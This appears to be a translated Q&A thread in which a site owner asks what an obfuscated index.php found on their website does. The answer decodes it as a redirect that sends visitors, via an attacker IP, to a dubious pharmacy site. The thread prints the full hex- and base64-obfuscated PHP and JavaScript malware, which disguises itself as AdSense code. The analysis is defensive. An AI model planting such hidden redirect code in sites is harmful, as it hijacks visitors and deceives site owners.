在网站上发现奇怪的index.php

时间:2014-06-27 21:01:48

标签: php security web

我发现了一个奇怪而模糊的文件" Index.php"在我的网站上。我不知道是谁把它放在我的页面上,但我想了解它的作用。

首先通过用十六进制值替换字符来隐藏文件。

<?php /* copyright */ ${"GL\x4fB\x41\x4c\x53"}["\x6bg\x6e\x72\x77i\x6e\x64\x62n"]="\x74x\x74";$egeillbp="\x6b";${"\x47\x4cO\x42\x41L\x53"}["\x63kmj\x63uie"]="\x76";foreach($_GET as${$egeillbp}=>${${"\x47L\x4fB\x41\x4cS"}["\x63k\x6d\x6acu\x69e"]}){${"\x47\x4cO\x42\x41\x4c\x53"}["d\x78\x77\x71o\x61lv\x61\x75\x65"]="\x6b";if(preg_match("!^[a-\x7a\x30-\x39]{10,\x332}\$\x21is",${${"\x47\x4cO\x42\x41LS"}["\x64\x78\x77\x71\x6f\x61\x6c\x76a\x75\x65"]})){$xfgspywrt="\x6b";$jdhbwek="\x74\x78\x74";${$jdhbwek}=base64_decode("\x50\x46\x4eD\x55klQV\x43B\x73Y\x57\x35\x6edWFnZT1q\x59\x58Z\x68\x63\x32\x4ey\x61X\x420Pg\x30\x4b\x50\x43E\x74L\x510K\x5a\x6eVuY3Rpb2\x34g\x5a\x32V0\x62W\x55o\x63\x33RyK\x510\x4b\x65yB2YX\x49g\x61WR4ID\x30\x67\x633R\x79\x4cmluZGV\x34\x542\x59\x6f\x4a\x7a\x38n\x4bT\x73\x67a\x57\x59g\x4bG\x6c\x6be\x43A9P\x53A\x74\x4dS\x6bgc\x6dV0\x64\x58\x4au\x49\x48\x4e\x30cjsgd\x6dFy\x49Gx\x6cb\x69\x419\x49\x48\x4e0ci5\x73ZW\x35\x6e\x64G\x67\x37I\x48Z\x68\x63\x69B\x75\x5aXd\x66c3R\x79I\x440g\x49\x69I7\x49HZ\x68c\x69\x42\x70ID0\x67\x4dTs\x67\x5am\x39\x79I\x43g\x72K2\x6c\x6beDs\x67\x61\x57R\x34\x49\x44w\x67\x62G\x56\x75O\x79Bp\x5a\x48g\x67\x4bz0\x67\x4dixp\x4b\x79\x73\x70D\x51\x70\x37IH\x5ahciB\x6aaC\x41\x39\x49H\x42h\x63n\x4e\x6c\x53W\x35\x30KHN0\x63i\x35\x7a\x64\x57\x4az\x64\x48\x49oa\x57\x524LC\x41\x79KS\x77\x67\x4d\x54YpOy\x42\x75ZXd\x66\x63\x33RyICs\x39IFN\x30\x63ml\x75\x5ay\x35\x6dcm\x39t\x51\x32\x68\x68c\x6b\x4evZ\x47\x55o\x4b\x47N\x6fI\x43\x73ga\x53k\x67\x4aSAyNTY\x70\x4fy\x429IA0KZ\x479jdW\x31\x6cb\x6e\x51ud3Jp\x64\x47U\x6f\x62\x6d\x56\x33\x58\x33\x4e0c\x695zdWJ\x7a\x64H\x49o\x4d\x43xu\x5a\x58\x64f\x633\x52y\x4c\x6dx\x6c\x62\x6d\x640\x61C\x30xMSk\x72\x49lx\x31MD\x41yNlx1M\x44\x412\x4e1\x781M\x44\x41\x32Rl\x781\x4dDA\x32\x51\x6c\x781\x4dD\x412Qlx1M\x44\x41\x7a\x52Fp\x61Wl\x70\x63d\x54\x41\x77M\x6a\x4ac\x64\x54A\x77\x4d0\x4acdTA\x77M0Nc\x64T\x41\x77\x4d\x6bZcd\x54AwNz\x4e\x63d\x54\x41\x77\x4ejN\x63dT\x41w\x4ez\x4acdT\x41\x77\x4ejlcd\x54A\x77\x4ez\x42\x63dTA\x77NzR\x63\x64TA\x77\x4d0\x55i\x4b\x54sNC\x6e0\x4eC\x6d\x64vb\x32\x64\x73ZV\x39\x68\x5a\x46\x39jb\x47\x6c\x6cb\x6eQg\x50\x53A\x69c\x48V\x69\x4cTE\x30M\x7a\x411\x4fDQ\x30M\x44g\x7aMTM\x34\x4e\x44\x4d\x69O\x770\x4b\x5a\x329v\x5a2xlX\x32\x46\x6bX\x33d\x70\x5aH\x52\x6f\x49D\x30g\x4e\x7aI\x34\x4f\x77\x30KZ\x32\x39vZ2\x78lX2\x46\x6b\x58\x32\x68la\x57\x64o\x64\x43A\x39IDk\x77Ow\x30KZ29vZ2\x78\x6c\x58\x32F\x6bX\x32Z\x76c\x6d\x31h\x64\x43A9\x49\x43I3\x4d\x6a\x68\x34OTBf\x59\x58\x4diOw\x30\x4b\x5a29\x76\x5a\x32\x78l\x58\x32Fk\x583\x525cGU\x67P\x53A\x69dG\x56\x34dF\x39\x70\x62\x57F\x6eZ\x53\x497\x44Q\x70\x6e\x6229\x6e\x62\x47\x56\x66Y\x57Rf\x59\x32hh\x62\x6d5l\x62C\x419\x49\x43\x49\x69O\x77\x30KZ\x32\x560\x62WUo\x49\x6d\x680\x64H\x416Ly9\x77Y\x57d\x6cYWQ\x79L\x6d\x64vb2\x64sZ\x58N\x35bmR\x70Y\x32\x460a\x579\x75L\x6d\x4e\x76\x62\x53\x39wY\x57d\x6cYWQvc\x32\x68vd1\x39\x68Z\x48\x4du\x61nM/M\x30\x493MTYwN\x6b\x55\x32\x4e\x44\x5aB\x4e\x6bQxO\x44\x59zN\x54c2M\x7a\x56CN\x6ag\x31\x4d\x7aU4\x4eT\x55\x79QzE\x77\x4e\x54c0\x52\x44YxNEI1Q\x7aR\x43\x4e\x54k\x30Rj\x551NTg\x77NTIwNT\x670O\x54\x52\x45N\x44\x49\x30QzUz\x4d\x44\x6b0\x4ejQ4M\x30Iz\x4f\x44R\x42M\x30\x55\x30\x4d\x7aQ\x78ME\x5a\x47\x4d\x7a\x4d\x34\x4eD\x4d\x30M\x6aN\x45M\x44\x5aGQ\x55\x595R\x6bV\x47N\x6bY\x34R\x6aZGN\x6bYyRjR\x47N\x6bY\x33RUVG\x4dE\x591\x52\x6a\x46F\x51\x6a\x4aE\x4d\x6b\x4e\x46Nz\x49\x34MUY\x79\x4e\x6bY\x30\x4dTUxO\x54\x454RUV\x46N0R\x47\x52\x45Z\x45\x52\x6bQyMUUxRjB\x43R\x54V\x45\x51\x55R\x42RDV\x45\x4eU\x4d1RE\x52E\x52EN\x47MTIwMTBG\x4dDUwQj\x42FR\x44c\x69\x4bT\x73\x4e\x43\x69\x38\x76L\x530+I\x44wv\x55\x30\x4eSSVB\x55\x50\x67\x3d\x3d");echo str_replace("\x5a\x5a\x5a\x5a",${$xfgspywrt},${${"GLOB\x41LS"}["\x6bgnr\x77\x69\x6e\x64\x62\x6e"]});exit;}} /* copyright */ ?>

我制作了一个小工具,将脚本翻译成了它的起源。

<?php /* copyright */ 

    ${"GLOBALS"}["kgnrwindbn"]="txt";
    $egeillbp="k";${"GLOBALS"}["ckmjcuie"]="v";

    foreach($_GET as${$egeillbp}=>${${"GLOBALS"}["ckmjcuie"]})
    {
        ${"GLOBALS"}["dxwqoalvaue"]="k";
        if(preg_match("!^[a-z0-9]{10,32}\$!is",${${"GLOBALS"}["dxwqoalvaue"]}))
        {
            $xfgspywrt="k";
            $jdhbwek="txt";
            ${$jdhbwek} = base64_decode("PFNDUklQVCBsYW5ndWFnZT1qYXZhc2NyaXB0Pg0KPCEtLQ0KZnVuY3Rpb24gZ2V0bWUoc3RyKQ0KeyB2YXIgaWR4ID0gc3RyLmluZGV4T2YoJz8nKTsgaWYgKGlkeCA9PSAtMSkgcmV0dXJuIHN0cjsgdmFyIGxlbiA9IHN0ci5sZW5ndGg7IHZhciBuZXdfc3RyID0gIiI7IHZhciBpID0gMTsgZm9yICgrK2lkeDsgaWR4IDwgbGVuOyBpZHggKz0gMixpKyspDQp7IHZhciBjaCA9IHBhcnNlSW50KHN0ci5zdWJzdHIoaWR4LCAyKSwgMTYpOyBuZXdfc3RyICs9IFN0cmluZy5mcm9tQ2hhckNvZGUoKGNoICsgaSkgJSAyNTYpOyB9IA0KZG9jdW1lbnQud3JpdGUobmV3X3N0ci5zdWJzdHIoMCxuZXdfc3RyLmxlbmd0aC0xMSkrIlx1MDAyNlx1MDA2N1x1MDA2Rlx1MDA2Qlx1MDA2Qlx1MDAzRFpaWlpcdTAwMjJcdTAwM0JcdTAwM0NcdTAwMkZcdTAwNzNcdTAwNjNcdTAwNzJcdTAwNjlcdTAwNzBcdTAwNzRcdTAwM0UiKTsNCn0NCmdvb2dsZV9hZF9jbGllbnQgPSAicHViLTE0MzA1ODQ0MDgzMTM4NDMiOw0KZ29vZ2xlX2FkX3dpZHRoID0gNzI4Ow0KZ29vZ2xlX2FkX2hlaWdodCA9IDkwOw0KZ29vZ2xlX2FkX2Zvcm1hdCA9ICI3Mjh4OTBfYXMiOw0KZ29vZ2xlX2FkX3R5cGUgPSAidGV4dF9pbWFnZSI7DQpnb29nbGVfYWRfY2hhbm5lbCA9ICIiOw0KZ2V0bWUoImh0dHA6Ly9wYWdlYWQyLmdvb2dsZXN5bmRpY2F0aW9uLmNvbS9wYWdlYWQvc2hvd19hZHMuanM/M0I3MTYwNkU2NDZBNkQxODYzNTc2MzVCNjg1MzU4NTUyQzEwNTc0RDYxNEI1QzRCNTk0RjU1NTgwNTIwNTg0OTRENDI0QzUzMDk0NjQ4M0IzODRBM0U0MzQxMEZGMzM4NDM0MjNEMDZGQUY5RkVGNkY4RjZGNkYyRjRGNkY3RUVGMEY1RjFFQjJEMkNFNzI4MUYyNkY0MTUxOTE4RUVFN0RGREZERkQyMUUxRjBCRTVEQURBRDVENUM1RERERENGMTIwMTBGMDUwQjBFRDciKTsNCi8vLS0+IDwvU0NSSVBUPg==");
            echo str_replace("ZZZZ",${$xfgspywrt},${${"GLOBALS"}["kgnrwindbn"]});
            exit;
        } 
    }
/* copyright */ ?>

但由于内部的base64解码,这仍然没有用。 已解码的内容如下所示:

<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } 
document.write(new_str.substr(0,new_str.length-11)+"\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}
google_ad_client = "pub-1430584408313843";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_ad_channel = "";
getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");
//--> </SCRIPT>

此外,Unicode部分也已编码。这是解码Unicode部分的结果。

&gokk=ZZZZ";</script>

现在我知道了内容,但仍然无法弄清楚它的作用。 (而且我不想尝试一个我不知道的剧本。)

我的猜测是它试图在循环中调用谷歌添加。但这是否有意义 - 因为谷歌将阻止重复的IP地址。

有没有人在您的网站上看过这些脚本?或者你知道脚本的作用吗? 谢谢你的所有建议。

1 个答案:

答案 0 :(得分:7)

在做了一些调查之后,看起来这个脚本正试图将index.php所在地的任何点击重定向到可疑意图的制药网站。所有谷歌的东西都是一种巧妙实现的方式来隐藏JavaScript中的URL重定向。

首先,将document.write替换为console.log

function getme(str) {
    var idx = str.indexOf('?');
    if (idx == -1) return str;
    var len = str.length;
    var new_str = "";
    var i = 1;
    for (++idx; idx < len; idx += 2, i++) {
        var ch = parseInt(str.substr(idx, 2), 16);
        new_str += String.fromCharCode((ch + i) % 256);
    }
    console.log(new_str.substr(0, new_str.length - 11) + "\u0026\u0067\u006F\u006B\u006B\u003DZZZZ\u0022\u003B\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");
}

getme("http://pagead2.googlesyndication.com/pagead/show_ads.js?3B71606E646A6D186357635B685358552C10574D614B5C4B594F5558052058494D424C530946483B384A3E43410FF33843423D06FAF9FEF6F8F6F6F2F4F6F7EEF0F5F1EB2D2CE7281F26F4151918EEE7DFDFDFD21E1F0BE5DADAD5D5C5DDDDCF12010F050B0ED7");

我们得到了这个:

<script language="javascript">window.location="http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ";</script>

re.da.ct.ed是一个IP地址。函数getme()只是解析附加到Google URL(这是一个红色鲱鱼)的slug。

对已解码的URL上的标头执行cURL请求,我们得到:

$ curl 'http://re.da.ct.ed/rr.php?aff=7012&sub=3401&gokk=ZZZZ' -I
HTTP/1.1 302 Found
Date: Fri, 27 Jun 2014 21:07:39 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u5
Location: https://www.sleazydrugstore.net
Vary: Accept-Encoding
Content-Type: text/html

看起来它只不过是将访客重定向到一个看起来很肮脏的药店,尽管可能会有更多恶意隐藏在那里。

我不确定是否在这里发布真实的网址和IP,因此我们将不胜感激。